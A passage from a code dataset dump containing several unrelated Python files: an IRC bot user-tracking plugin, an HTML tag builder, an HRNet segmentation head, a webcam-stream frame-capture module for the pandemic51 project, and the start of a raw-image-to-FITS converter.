Also provides an authorisation system.\nThis plugin uses WHOIS to figure out someones NickServ account and then links\nthat to an automatically created, in-bot account.\n\"\"\"\nfrom __future__ import unicode_literals, print_function\n\nimport ast\nimport asyncio\nimport re\nfrom typing import Any, Dict, List, Optional, Set\n\nimport irc3\nfrom irc3.plugins.storage import Storage\nfrom irc3.utils import IrcString\n\n\nclass User(object):\n \"\"\"User object\"\"\"\n\n def __init__(self, mask, channels: List[str], id_, database=None):\n self.nick = mask.nick\n self.host = mask.host\n self.channels: Set[str] = set()\n self.id = id_\n self.database: Optional[Storage] = database\n try:\n if isinstance(channels, str):\n raise ValueError(\"You must specify a list of channels!\")\n for c in iter(channels):\n self.channels.add(c)\n except TypeError:\n raise ValueError(\"You need to specify in which channel this \" \"user is!\")\n\n @property\n def mask(self) -> IrcString:\n \"\"\"Get the mask of this user\"\"\"\n return IrcString(\"{}!{}\".format(self.nick, self.host))\n\n def _get_database(self) -> Storage:\n if self.database is None:\n raise Exception(\"No database set for this user.\")\n return self.database\n\n def set_settings(self, settings):\n \"\"\"Replaces the settings with the provided dictionary\"\"\"\n\n async def wrapper():\n id_ = await self.id()\n self._get_database()[id_] = settings\n\n asyncio.ensure_future(wrapper())\n\n def set_setting(self, setting: str, value: Any):\n \"\"\"Set a specified setting to a value\"\"\"\n print(\"Trying to set %s to %s\" % (setting, value))\n\n async def wrapper():\n id_ = await self.id()\n self._get_database().set(id_, **{setting: value})\n\n asyncio.ensure_future(wrapper())\n\n async def get_settings(self) -> Dict[str, Any]:\n \"\"\"Get this users settings\"\"\"\n id_ = await self.id()\n return self._get_database().get(id_, dict())\n\n async def get_setting(self, setting, default=None) -> Any:\n \"\"\"Gets a setting for the users. 
Can be any type.\"\"\"\n settings = await self.get_settings()\n result = settings.get(setting, default)\n if isinstance(result, str):\n try:\n parsed = ast.literal_eval(result)\n return parsed\n except (ValueError, SyntaxError):\n pass\n\n return result\n\n def join(self, channel) -> None:\n \"\"\"Register that the user joined a channel\"\"\"\n self.channels.add(channel)\n\n def part(self, channel) -> None:\n \"\"\"Register that the user parted a channel\"\"\"\n self.channels.remove(channel)\n\n def still_in_channels(self) -> bool:\n \"\"\"Is the user still in channels?\"\"\"\n return len(self.channels) > 0\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Compare users by nick\n\n Since nicks are unique this works for exactly one irc server.\n \"\"\"\n if not isinstance(other, self.__class__):\n return False\n return self.nick == other.nick\n\n\n@irc3.plugin\nclass UsersPlugin(object):\n \"\"\"User management plugin for OneBot\n\n Doesn't do anything with NAMES because we can't get hosts through\n NAMES\n\n Configuration settings:\n - ``identify_by``: the identification method\n\n Identification methods available:\n - ``mask``: Use the hostmask\n - ``whatcd``: Get the what.cd username from the host mask\n - ``nickserv``: Parse nickserv info from ``WHOIS``.\n \"\"\"\n\n requires = [\"irc3.plugins.storage\", \"irc3.plugins.asynchronious\"]\n\n def __init__(self, bot: irc3.IrcBot):\n \"\"\"Initialises the plugin\"\"\"\n self.bot = bot\n config = bot.config.get(__name__, {})\n self.identifying_method = config.get(\"identify_by\", \"mask\")\n self.log = bot.log.getChild(__name__)\n self.connection_lost()\n\n @irc3.extend\n def get_user(self, nick):\n user = self.active_users.get(nick)\n if not user:\n self.log.warning(\"Couldn't find %s!\", nick)\n return user\n\n @irc3.event(irc3.rfc.JOIN_PART_QUIT)\n def on_join_part_quit(self, mask=None, **kwargs):\n event = kwargs[\"event\"]\n self.log.debug(\"%s %sed\", mask.nick, event.lower())\n getattr(self, event.lower())(mask.nick, mask, **kwargs)\n\n @irc3.event(irc3.rfc.KICK)\n def on_kick(self, mask=None, target=None, **kwargs):\n self.log.debug(\"%s kicked %s\", mask.nick, target.nick)\n self.part(target.nick, target, **kwargs)\n\n @irc3.event(irc3.rfc.NEW_NICK)\n def on_new_nick(self, nick=None, new_nick=None, **kwargs):\n self.log.debug(\"%s renamed to %s\", nick.nick, new_nick)\n if nick.nick in self.active_users:\n user = self.active_users[nick.nick]\n user.nick = new_nick\n del self.active_users[nick.nick]\n self.active_users[new_nick] = user\n\n @irc3.event(irc3.rfc.PRIVMSG)\n def on_privmsg(self, mask=None, event=None, target=None, data=None):\n if target not in self.channels:\n return\n if mask.nick not in self.active_users:\n self.log.debug(\"Found user %s via PRIVMSG\", mask.nick)\n self.active_users[mask.nick] = self.create_user(mask, [target])\n else:\n self.active_users[mask.nick].join(target)\n\n def connection_lost(self):\n self.channels = set()\n self.active_users = dict()\n\n def join(self, nick, mask, channel=None, **kwargs):\n self.log.debug(\"%s joined channel %s\", nick, channel)\n # This can only be observed if we're in that channel\n self.channels.add(channel)\n if nick == self.bot.nick:\n self.bot.send(\"WHO {}\".format(channel))\n\n if nick not in self.active_users:\n self.active_users[nick] = self.create_user(mask, [channel])\n\n self.active_users[nick].join(channel)\n\n def quit(self, nick, _mask, **kwargs):\n if nick == self.bot.nick:\n self.connection_lost()\n\n if nick in self.active_users:\n del 
self.active_users[nick]\n\n def part(self, nick, mask, channel=None, **kwargs):\n if nick == self.bot.nick:\n self.log.info(\"%s left %s by %s\", nick, channel, kwargs[\"event\"])\n for n, user in self.active_users.copy().items():\n user.part(channel)\n if not user.still_in_channels():\n del self.active_users[n]\n # Remove channel from administration\n self.channels.remove(channel)\n\n if nick not in self.active_users:\n return\n\n self.active_users[nick].part(channel)\n if not self.active_users[nick].still_in_channels():\n self.log.debug(\"Lost %s out of sight\", mask.nick)\n del self.active_users[nick]\n\n @irc3.event(irc3.rfc.RPL_WHOREPLY)\n def on_who(\n self, channel=None, nick=None, username=None, host=None, server=None, **kwargs\n ):\n \"\"\"Process a WHO reply since it could contain new information.\n\n Should only be processed for channels we are currently in!\n \"\"\"\n if channel not in self.channels:\n self.log.debug(\n \"Got WHO for channel I'm not in: {chan}\".format(chan=channel)\n )\n return\n\n self.log.debug(\"Got WHO for %s: %s (%s)\", channel, nick, host)\n\n if nick not in self.active_users:\n mask = IrcString(\"{}!{}@{}\".format(nick, username, host))\n self.active_users[nick] = self.create_user(mask, [channel])\n else:\n self.active_users[nick].join(channel)\n\n def create_user(self, mask, channels):\n \"\"\"Return a User object\"\"\"\n if self.identifying_method == \"mask\":\n\n async def id_func():\n return mask.host\n\n return User(mask, channels, id_func, self.bot.db)\n if self.identifying_method == \"nickserv\":\n\n async def get_account():\n user = self.get_user(mask.nick)\n if hasattr(user, \"account\"):\n return user.account\n result = await self.bot.async_cmds.whois(mask.nick)\n if result[\"success\"] and \"account\" in result:\n user.account = str(result[\"account\"])\n return user.account\n else:\n return mask.host\n\n return User(mask, channels, get_account, self.bot.db)\n if self.identifying_method == \"whatcd\":\n\n async def id_func():\n match = re.match(r\"^\\d+@(.*)\\.\\w+\\.what\\.cd\", mask.host.lower())\n if match:\n return match.group(1)\n else:\n self.log.debug(\n \"Failed to extract what.cd user name\"\n \"from {mask}\".format(mask=mask)\n )\n return mask.host\n\n return User(mask, channels, id_func, self.bot.db)\n else: # pragma: no cover\n raise ValueError(\"A valid identifying method should be configured\")\n\n @classmethod\n def reload(cls, old): # pragma: no cover\n users = old.active_users\n newinstance = cls(old.bot)\n for user in users.values():\n user.database = newinstance.bot.db\n newinstance.channels = old.channels\n newinstance.users = users\n","repo_name":"thomwiggers/onebot","sub_path":"onebot/plugins/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":9692,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"7"} +{"seq_id":"38783883772","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nclass Tag:\n '''Class returns HTML for accepted tag and params of tag'''\n \n def __init__(self, tag, toplevel=False, is_single=False):\n '''Inits the instance.\n tag - str with accepted HTML tag\n attributes - dict for build attributes of HTML tag\n chldren - list of children tags'''\n self.tag = tag\n self.text = \"\"\n self.attributes = {}\n\n self.toplevel = toplevel\n self.is_single = is_single\n self.children = []\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, value, traceback):\n if self.toplevel:\n print(\"<%s>\" % self.tag)\n for child in 
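User.get_setting above round-trips stored strings through ast.literal_eval; the same parsing in isolation:

import ast

def parse_setting(result):
    # strings that parse as Python literals come back as objects,
    # anything else is returned unchanged
    if isinstance(result, str):
        try:
            return ast.literal_eval(result)
        except (ValueError, SyntaxError):
            pass
    return result

print(parse_setting("[1, 2, 3]"), parse_setting("plain text"))  # [1, 2, 3] plain text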
self.children:\n print(child)\n\n print(\"\" % self.tag)\n\n def __str__(self):\n attrs = []\n for attribute, value in self.attributes.items():\n attrs.append('%s=\"%s\"' % (attribute, value))\n attrs = \" \".join(attrs)\n\n if self.children:\n opening = \"<{tag} {attrs}>\".format(tag=self.tag, attrs=attrs)\n internal = \"%s\" % self.text\n# print(str(self.children))\n for child in self.children:\n internal += str(child)\n ending = \"\" % self.tag\n return opening + internal + ending\n else:\n if self.is_single:\n return \"<{tag} {attrs}/>\".format(tag=self.tag, attrs=attrs)\n\n else:\n return \"<{tag} {attrs}>{text}\".format(\n tag=self.tag, attrs=attrs, text=self.text\n )\n \nif __name__ == \"__main__\":\n with Tag(\"body\", toplevel=True) as body:\n with Tag(\"div\") as div:\n with Tag(\"p\") as paragraph:\n paragraph.text = \"Какой-то текст\"\n div.children.append(paragraph)\n body.children.append(div)\n \n ","repo_name":"McSim85/skillfactory_web","sub_path":"B3/B3.11-with/with-example.py","file_name":"with-example.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"72865118622","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch._utils\nimport torch.nn.functional as F\n\nfrom .segbase import SegBaseModel\nfrom .model_zoo import MODEL_REGISTRY\nfrom ..config import cfg\n\n\n@MODEL_REGISTRY.register(name='HRNet')\nclass HighResolutionNet(SegBaseModel):\n def __init__(self):\n super(HighResolutionNet, self).__init__()\n self.hrnet_head = _HRNetHead(self.nclass, self.encoder.last_inp_channels)\n self.__setattr__('decoder', ['hrnet_head'])\n\n def forward(self, x):\n shape = x.shape[2:]\n x = self.encoder(x)\n x = self.hrnet_head(x)\n x = F.interpolate(x, size=shape, mode='bilinear', align_corners=False)\n return [x]\n\n\nclass _HRNetHead(nn.Module):\n def __init__(self, nclass, last_inp_channels, norm_layer=nn.BatchNorm2d):\n super(_HRNetHead, self).__init__()\n\n self.last_layer = nn.Sequential(\n nn.Conv2d(\n in_channels=last_inp_channels,\n out_channels=last_inp_channels,\n kernel_size=1,\n stride=1,\n padding=0),\n\n norm_layer(last_inp_channels),\n nn.ReLU(inplace=False),\n nn.Conv2d(\n in_channels=last_inp_channels,\n out_channels=nclass,\n kernel_size=cfg.MODEL.HRNET.FINAL_CONV_KERNEL,\n stride=1,\n padding=1 if cfg.MODEL.HRNET.FINAL_CONV_KERNEL == 3 else 0)\n )\n\n def forward(self, x):\n # Upsampling\n x0_h, x0_w = x[0].size(2), x[0].size(3)\n x1 = F.interpolate(x[1], size=(x0_h, x0_w), mode='bilinear', align_corners=False)\n x2 = F.interpolate(x[2], size=(x0_h, x0_w), mode='bilinear', align_corners=False)\n x3 = F.interpolate(x[3], size=(x0_h, x0_w), mode='bilinear', align_corners=False)\n\n x = torch.cat([x[0], x1, x2, x3], 1)\n x = self.last_layer(x)\n return x\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/contrib/cv/semantic_segmentation/FastSCNN/segmentron/models/hrnet_seg.py","file_name":"hrnet_seg.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"35075151233","text":"from __future__ import unicode_literals\nfrom datetime import datetime\nimport io\nimport json\nimport logging\nimport os\nimport requests\nfrom retrying import retry\nimport time\nimport urllib\n\nfrom bs4 import BeautifulSoup\nimport ffmpy\nimport m3u8\nimport numpy as np\nfrom PIL import Image\nfrom selenium 
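A shape check of the fusion in _HRNetHead.forward above: the three lower-resolution branches are upsampled to the first branch's spatial size and concatenated along channels (the branch widths 18/36/72/144 are the usual HRNet-W18 values, assumed here for illustration):

import torch
import torch.nn.functional as F

x = [torch.randn(1, c, 64 // s, 64 // s) for c, s in [(18, 1), (36, 2), (72, 4), (144, 8)]]
up = [x[0]] + [F.interpolate(t, size=x[0].shape[2:], mode='bilinear', align_corners=False)
               for t in x[1:]]
print(torch.cat(up, dim=1).shape)  # torch.Size([1, 270, 64, 64])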
import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.chrome.options import Options\nfrom youtube_dl import YoutubeDL\n\nimport eta.core.image as etai\nimport eta.core.serial as etas\nimport eta.core.utils as etau\n\nimport pandemic51.config as panc\nfrom pandemic51.core.database import add_stream_history\n\n\nlogger = logging.getLogger(__name__)\n\n\nCHUNK_URL_MAX_NUM_ATTEMPTS = 20\nCHUNK_URL_SLEEP_SECONDS = 1\n\n\ndef get_img_urls(webpage):\n '''Open the webpage and parse the source HTML for any image urls.\n\n Args:\n webpage: The webpage to scrape for image urls\n\n Returns:\n urls: List of url strings for all images in the webpage\n '''\n # Get the source from the page\n driver = _configure_webdriver()\n driver.get(webpage)\n\n # Ensure that all images have had time to load\n time.sleep(1)\n\n # Parse the source HTML for images with PSLNM in the title\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n driver.service.stop()\n img_tags = soup.find_all('img')\n urls = [img['src'] for img in img_tags]\n return urls\n\n\ndef save_video(chunk_path, uri, output_dir):\n '''Saves the video at the given URI to the given output directory.\n\n Args:\n chunk_path: the URL path for the chunklist\n uri: the video URI\n output_dir: the output directory\n\n Returns:\n the output video path\n '''\n base_path = os.path.split(chunk_path)[0]\n input_video = os.path.join(base_path, uri)\n if \"earthcam\" in chunk_path:\n res = requests.get(\n input_video,\n headers={\n \"Host\": \"https://www.earthcam.com\",\n \"Referrer\": \"https://www.earthcam.com/\"\n }\n )\n input_video = \"./temp.ts\"\n with open(input_video, \"wb\") as ff:\n ff.write(res.content)\n\n out_name = os.path.splitext(uri)[0] + \".mp4\"\n output_video_path = os.path.join(output_dir, out_name)\n\n etau.ensure_basedir(output_video_path)\n ffmpy.FFmpeg(\n inputs={input_video: None},\n outputs={output_video_path: None},\n ).run()\n\n return output_video_path\n\n\ndef sample_first_frame(inpath, outpath):\n '''Samples the first frame of the given video.\n\n Args:\n inpath: input video path\n outpath: the path to write the output image\n\n Returns:\n True if the image was created, or False if it already existed\n '''\n if os.path.exists(outpath):\n return False\n\n outcmd = \"-ss 00:00:00 -t 00:00:01 -r 1 -f image2\"\n\n etau.ensure_basedir(outpath)\n ffmpy.FFmpeg(\n inputs={inpath: None},\n outputs={outpath: outcmd},\n ).run()\n\n return True\n\n\nclass Stream(etas.Serializable):\n '''Abstract class for streams of various types providing functionality for\n downloading clips and images from the stream, getting the latest stream URL,\n etc.\n '''\n def __init__(self, stream_name, GMT):\n '''\n Args:\n stream_name: name of the stream (should match JSON file in\n {{pandemic51}}/config/streams/\n GMT: integer relative timezone of stream\n '''\n self.type = etau.get_class_name(self)\n self.stream_name = stream_name\n self.GMT = GMT\n\n @staticmethod\n def stream_path(stream_name):\n '''Get the path to the Stream JSON file.\n\n Args:\n stream_name: name of the stream\n\n Returns:\n path the the Stream object serialized on disk\n '''\n return os.path.join(panc.STREAMS_DIR, stream_name + \".json\")\n\n @staticmethod\n def get_stream_names():\n '''Get names of all streams serialized on disk.\n\n Returns:\n a list of stream_name strings\n '''\n _, matches = etau.parse_glob_pattern(Stream.stream_path(\"*\"))\n return [x[0] for x in matches]\n\n @property\n def path(self):\n 
'''Path to the Stream serialized on disk'''\n return self.stream_path(self.stream_name)\n\n def get_live_stream_url(self):\n '''Get the URL for streaming'''\n raise NotImplementedError(\"Subclass must implement\")\n\n def download_image(self, outdir):\n '''Downloads an image from the latest stream\n\n Args:\n outdir: the output directory\n\n Returns:\n is_new_img: `True` if the image was not already on disk\n image_path: path to the downloaded image on disk\n dt: datetime object of when the image was downloaded\n '''\n raise NotImplementedError(\"Subclass must implement\")\n\n def download_image_and_store(self, outdir):\n '''Downloads an image from the latest stream, and add it to the\n database.\n\n If an image with the same filename was already on disk, no new entry is\n added to the database.\n\n Args:\n stream_name: the stream name\n outdir: the output directory\n\n Returns:\n image_path: path the the downloaded image on disk\n dt: datetime object of when the image was downloaded\n '''\n is_new_img, image_path, dt = self.download_image(outdir)\n\n if is_new_img:\n add_stream_history(self.stream_name, dt, image_path)\n\n return image_path, dt\n\n @classmethod\n def from_dict(cls, d, *args, **kwargs):\n '''Constructs a Stream object from a JSON dictionary.\n\n Args:\n d: a JSON dictionary representation of a Serializable object\n\n Returns:\n a Stream instance\n '''\n downloader_cls = etau.get_class(d[\"type\"])\n return downloader_cls._from_dict(d)\n\n @classmethod\n def from_json(cls, path, *args, **kwargs):\n '''Constructs a Stream object from a JSON file.\n\n If `stream_name` key is missing, it is automatically populated.\n\n Args:\n path: the path to the JSON file on disk\n\n Returns:\n a Stream instance\n '''\n d = etas.read_json(path)\n\n if \"stream_name\" not in d:\n d[\"stream_name\"] = os.path.splitext(os.path.basename(path))[0]\n\n return cls.from_dict(d, *args, **kwargs)\n\n @classmethod\n def from_stream_name(cls, stream_name):\n '''Constructs a Stream object.\n\n Args:\n stream_name: the name of the stream\n\n Returns:\n a Stream instance\n '''\n return cls.from_json(cls.stream_path(stream_name))\n\n @classmethod\n def _from_dict(cls, d):\n raise NotImplementedError(\"Subclass must implement\")\n\n\nclass M3U8Stream(Stream):\n '''A Stream class that reads URIs from an M3U8 chunk path'''\n def __init__(self, stream_name, GMT, webpage):\n super(M3U8Stream, self).__init__(stream_name, GMT)\n self.webpage = webpage\n\n def get_live_stream_url(self):\n url = _get_chunk_url(self.webpage)\n\n if \"videos2archives\" in url:\n url = (\n \"https://pdi-service.voxel51.com/stream-archive/\" +\n url.split(\".com/\")[1]\n )\n elif \"earthcam\" in url:\n url = (\n \"https://pdi-service.voxel51.com/stream/\" +\n url.split(\".com/\")[1]\n )\n\n return url\n\n def download_image(self, outdir):\n '''Downloads an image from the latest stream\n\n Args:\n outdir: the output directory\n\n Returns:\n is_new_img: `True` if the image was not already on disk\n image_path: path the the downloaded image on disk\n dt: datetime object of when the image was downloaded\n '''\n with etau.TempDir(basedir=panc.BASE_DIR) as tmpdir:\n # Download video\n video_path, dt = self.download_chunk(tmpdir)\n\n if not video_path:\n # this is archival data, so don't return an image\n return False, None, dt\n\n # UTC integer timestamp (epoch time)\n timestamp = int(dt.timestamp())\n\n # Create path for image\n image_path = os.path.join(\n outdir, self.stream_name, \"%d.jpg\" % timestamp)\n\n is_new_img = 
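get_uris_and_chunk_path above relies on the `retrying` package; its decorator re-invokes the wrapped function until it stops raising. A minimal runnable example:

from retrying import retry

attempts = {"n": 0}

@retry(stop_max_attempt_number=3, wait_fixed=100)
def flaky():
    # fails twice, then succeeds on the third attempt
    attempts["n"] += 1
    if attempts["n"] < 3:
        raise RuntimeError("transient failure")
    return "ok"

print(flaky(), attempts["n"])  # ok 3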
sample_first_frame(video_path, image_path)\n\n            return is_new_img, image_path, dt\n\n    def download_chunk(self, output_dir):\n        '''Downloads a chunk of the given stream to the given directory.\n\n        Args:\n            output_dir: the output directory\n\n        Returns:\n            tuple of:\n                - path to the downloaded video chunk\n                    OR None if the stream is an archive stream\n                - the datetime when the video chunk was downloaded\n        '''\n        output_path = os.path.join(output_dir, self.stream_name)\n\n        uris, chunk_path = self.get_uris_and_chunk_path()\n\n        if \"archive\" in chunk_path:\n            return None, datetime.utcnow()\n\n        uri = uris[-1]\n\n        logger.info(\"Processing URI '%s'\", uri)\n        return save_video(chunk_path, uri, output_path), datetime.utcnow()\n\n    @retry(stop_max_attempt_number=10, wait_fixed=100)\n    def get_uris_and_chunk_path(self):\n        '''Attempts to load uris from the stream's chunk path. Handles HTTP\n        errors and refreshes the chunk path as needed.\n\n        Returns:\n            uris: the uris present in the chunk_path\n            chunk_path: the chunklist URL that the uris were loaded from\n        '''\n        chunk_path = _get_chunk_url(self.webpage)\n        try:\n            uris = m3u8.load(chunk_path).segments.uri\n            if not uris:\n                chunk_path = _get_chunk_url(self.webpage)\n                uris = m3u8.load(chunk_path).segments.uri\n\n        except urllib.error.HTTPError:\n            chunk_path = _get_chunk_url(self.webpage)\n            uris = m3u8.load(chunk_path).segments.uri\n\n        return uris, chunk_path\n\n    @classmethod\n    def _from_dict(cls, d):\n        stream_name = d[\"stream_name\"]\n        GMT = d[\"GMT\"]\n        webpage = d[\"webpage\"]\n        return cls(stream_name, GMT, webpage)\n\n\nclass MjpegStream(Stream):\n    '''A Stream class that reads MJPEGs'''\n    def __init__(self, stream_name, GMT, url):\n        super(MjpegStream, self).__init__(stream_name, GMT)\n        self.url = url\n\n    def get_live_stream_url(self):\n        '''Get the URL for streaming'''\n        return self.url\n\n    def download_image(self, outdir):\n        '''Downloads an image from the latest stream\n\n        Args:\n            outdir: the output directory\n\n        Returns:\n            is_new_img: `True` if the image was not already on disk\n            image_path: path to the downloaded image on disk\n            dt: datetime object of when the image was downloaded\n        '''\n        dt = datetime.utcnow()\n\n        # UTC integer timestamp (epoch time)\n        timestamp = int(dt.timestamp())\n\n        # Create path for image\n        image_path = os.path.join(\n            outdir, self.stream_name, \"%d.jpg\" % timestamp)\n        etau.ensure_basedir(image_path)\n\n        # Capture the current frame of the stream\n        is_new_img = sample_first_frame(self.url, image_path)\n\n        return is_new_img, image_path, dt\n\n    @classmethod\n    def _from_dict(cls, d):\n        stream_name = d[\"stream_name\"]\n        GMT = d[\"GMT\"]\n        url = d[\"url\"]\n        return cls(stream_name, GMT, url)\n\n\nclass ImageStream(Stream):\n    '''A Stream class for streams that intermittently take image snapshots,\n    rather than providing constant video feed.\n    '''\n\n    def __init__(self, stream_name, GMT, webpage, url_filter):\n        super(ImageStream, self).__init__(stream_name, GMT)\n        self.webpage = webpage\n        self.url_filter = url_filter\n\n    def get_live_stream_url(self):\n        '''Get the URL for streaming'''\n        # Get the source from the page\n        urls = get_img_urls(self.webpage)\n        filtered_urls = [u for u in urls if self.url_filter in u]\n\n        if not filtered_urls:\n            raise Exception(\"No URLs found for webpage: %s\" % self.webpage)\n\n        # we only need one!\n        url = filtered_urls[0]\n\n        # Get the large version of the image instead of the thumbnail\n        url = url[:-5] + \"l\" + url[-4:]\n\n        return url\n\n    def download_image(self, 
outdir):\n        '''Downloads an image from the latest stream\n\n        Args:\n            outdir: the output directory\n\n        Returns:\n            is_new_img: `True` if the image was not already on disk\n            image_path: path to the downloaded image on disk\n            dt: datetime object of when the image was downloaded\n        '''\n        url = self.get_live_stream_url()\n        img = self._load_image_from_url(url)\n        dt = self._parse_datetime(url)\n\n        # UTC integer timestamp (epoch time)\n        timestamp = int(dt.timestamp())\n\n        # Create path for image\n        image_path = os.path.join(\n            outdir, self.stream_name, \"%d.jpg\" % timestamp)\n        etau.ensure_basedir(image_path)\n\n        if os.path.exists(image_path):\n            is_new_img = False\n        else:\n            is_new_img = True\n            etai.write(img, image_path)\n\n        return is_new_img, image_path, dt\n\n    def _load_image_from_url(self, url):\n        data = requests.get(url).content\n        return np.array(Image.open(io.BytesIO(data)))\n\n    def _parse_datetime(self, url):\n        time_str = url.split(\"/\")[-1].split(\"_\")[0]\n        return datetime.strptime(time_str, \"%m%d%Y%H%M\")\n\n    @classmethod\n    def _from_dict(cls, d):\n        stream_name = d[\"stream_name\"]\n        GMT = d[\"GMT\"]\n        webpage = d[\"webpage\"]\n        url_filter = d[\"url_filter\"]\n        return cls(stream_name, GMT, webpage, url_filter)\n\n\nclass YouTubeStream(Stream):\n    '''A Stream class for YouTube live-streams.'''\n\n    def __init__(self, stream_name, GMT, youtube_id):\n        super(YouTubeStream, self).__init__(stream_name, GMT)\n        self.youtube_id = youtube_id\n        self._m3u8 = None\n\n    def get_live_stream_url(self):\n        '''Returns the livestream URL.'''\n        return \"https://www.youtube.com/embed/%s?autoplay=1\" % self.youtube_id\n\n    def get_m3u8_url(self, force=False):\n        '''Returns the current best m3u8 stream.'''\n        if force or self._m3u8 is None:\n            ydl_opts = {}\n            with YoutubeDL(ydl_opts) as ydl:\n                yyy = ydl.extract_info(self.youtube_id, download=False)\n                self._m3u8 = yyy['url']\n        return self._m3u8\n\n    def download_image(self, outdir):\n        '''Downloads an image from the stream\n\n        Args:\n            outdir: the output directory\n\n        Returns:\n            is_new_img: `True` if the image was not already on disk\n            image_path: path to the downloaded image on disk\n            dt: datetime object of when the image was downloaded\n        '''\n        m3u8_url = self.get_m3u8_url()\n\n        dt = datetime.utcnow()\n\n        # UTC integer timestamp (epoch time)\n        ts = int(dt.timestamp())\n\n        # Create path for image\n        image_path = os.path.join(outdir, self.stream_name, \"%d.jpg\" % ts)\n\n        # Capture the current frame of the stream\n        is_new_img = sample_first_frame(m3u8_url, image_path)\n\n        return is_new_img, image_path, dt\n\n    @classmethod\n    def _from_dict(cls, d):\n        stream_name = d[\"stream_name\"]\n        GMT = d[\"GMT\"]\n        youtube_id = d[\"youtube_id\"]\n        return cls(stream_name, GMT, youtube_id)\n\n\ndef _get_chunk_url(webpage):\n    driver = _configure_webdriver()\n    driver.get(webpage)\n\n    chunk_url = None\n    num_attempts = 0\n    while chunk_url is None and num_attempts < CHUNK_URL_MAX_NUM_ATTEMPTS:\n        try:\n            browser_log = driver.get_log(\"performance\")\n            events = [\n                _process_browser_log_entry(entry) for entry in browser_log]\n            events = [\n                e for e in events if \"Network.response\" in e[\"method\"]]\n\n            for event in events:\n                try:\n                    url = event[\"params\"][\"response\"][\"url\"]\n                    if \"chunk\" in url:\n                        chunk_url = url\n                except:\n                    pass\n        except:\n            num_attempts += 1\n            logger.info(\"Failed to get chunk URL from '%s'\", webpage)\n            time.sleep(CHUNK_URL_SLEEP_SECONDS)\n\n    driver.service.stop()\n\n    if chunk_url:\n        return chunk_url\n\n    raise TimeoutError(\n        \"Failed to get the chunklist from the network 
traffic\")\n\n\ndef _process_browser_log_entry(entry):\n return json.loads(entry[\"message\"])[\"message\"]\n\n\ndef _configure_webdriver():\n # Reference: https://stackoverflow.com/q/52633697\n caps = DesiredCapabilities.CHROME\n caps[\"goog:loggingPrefs\"] = {\"performance\": \"ALL\"}\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\")\n driver = webdriver.Chrome(\n desired_capabilities=caps, options=chrome_options,\n executable_path=\"/usr/bin/chromedriver\")\n return driver\n","repo_name":"voxel51/pandemic51","sub_path":"pandemic51/core/streaming.py","file_name":"streaming.py","file_ext":"py","file_size_in_byte":17271,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"71032526623","text":"import numpy as np\r\nimport subprocess, os\r\nfrom datetime import datetime\r\nfrom netpbmfile import NetpbmFile\r\nfrom astropy.io import fits\r\nimport piexif\r\nfrom PIL.ExifTags import TAGS\r\n\r\n\r\nRAW_DIR = \"./raw/\"\r\nFITS_DIR = \"./fits/\"\r\n\r\nOBSERVERS = \"Shamloo_Yeganeh_Khanali\" # \"RezaRezaei\"\r\nFILTERNAME = \"V\"\r\nOBSOBJ = \"Dark\"\r\nIMAGETYP = \"Dark Frame\"\r\nTELESCOPE = \"Newton8\"\r\nLOCATION = \"Aznaveh\"\r\n\r\n# -c: standard output\r\n# -v: print verbose messages\r\n# -w: use camera white balance\r\n# -4: linear 16-bit output\r\n# -q 4: RCD demosaicing\r\n# -S 65535: set saturation level to maximum possible value for no data loss\r\nDCRAW_OPTIONS = (\"./dcraw\", \"-c\", \"-v\", \"-w\", \"-4\", \"-q\", \"4\", \"-S\", \"65535\")\r\n\r\n\r\ndef get_metadata(filepath):\r\n metadata = piexif.load(filepath)\r\n datetime = metadata[\"0th\"][piexif.ImageIFD.DateTime].decode()\r\n exposure = metadata[\"Exif\"][piexif.ExifIFD.ExposureTime]\r\n return (\r\n (\"DATE-OBS\", convert_datetime_fits(datetime)),\r\n (\"EXPTIME\", round(exposure[0] / exposure[1], 5)),\r\n (\"ISOSPEED\", metadata[\"Exif\"][piexif.ExifIFD.ISOSpeedRatings]),\r\n (\"INSTRUME\", metadata[\"0th\"][piexif.ImageIFD.Model].decode())\r\n )\r\n\r\n\r\ndef get_fits_name(metadata, has_filter=True, add_location_name=True,\r\n add_telescope_name=True):\r\n filterstr = '_' + FILTERNAME[0] if has_filter else ''\r\n locationstr = '_' + LOCATION if add_location_name else ''\r\n telescopestr = '_' + TELESCOPE if add_telescope_name else ''\r\n return (OBSERVERS + filterstr + '_' + OBSOBJ + '_' + str(metadata[1][1])\r\n + 's' + '_ISO' + str(metadata[2][1])\r\n + '_' + metadata[3][1].split(' ')[-1] + telescopestr\r\n + '_' + convert_datetime_filename(metadata[0][1])\r\n + locationstr + \".fits\")\r\n\r\n\r\ndef get_raw_data(filepath):\r\n with open(\"temp.pam\", \"wb\") as netpbm_output:\r\n subprocess.run(DCRAW_OPTIONS + (filepath,), stdout=netpbm_output)\r\n with NetpbmFile(\"temp.pam\") as netpbm_file:\r\n # Read data and reshape to correct FITS dimensions\r\n data = netpbm_file.asarray().transpose().swapaxes(1, 2)\r\n if data.shape[-2] > data.shape[-1]:\r\n data = np.rot90(data, 3, (-2, -1))\r\n os.remove(\"temp.pam\")\r\n return data\r\n\r\n\r\ndef set_fits_header(header, metadata, has_filter=True,\r\n add_telescope_name=True, add_object_name=True):\r\n while len(header) < (2 * 36 - 1):\r\n header.append()\r\n header[\"IMAGETYP\"] = IMAGETYP\r\n header[\"DATE\"] = datetime.utcnow().isoformat()[:-7]\r\n for (keyword, value) in metadata:\r\n header[keyword] = value\r\n if add_telescope_name:\r\n header[\"TELESCOP\"] = TELESCOPE\r\n if has_filter:\r\n 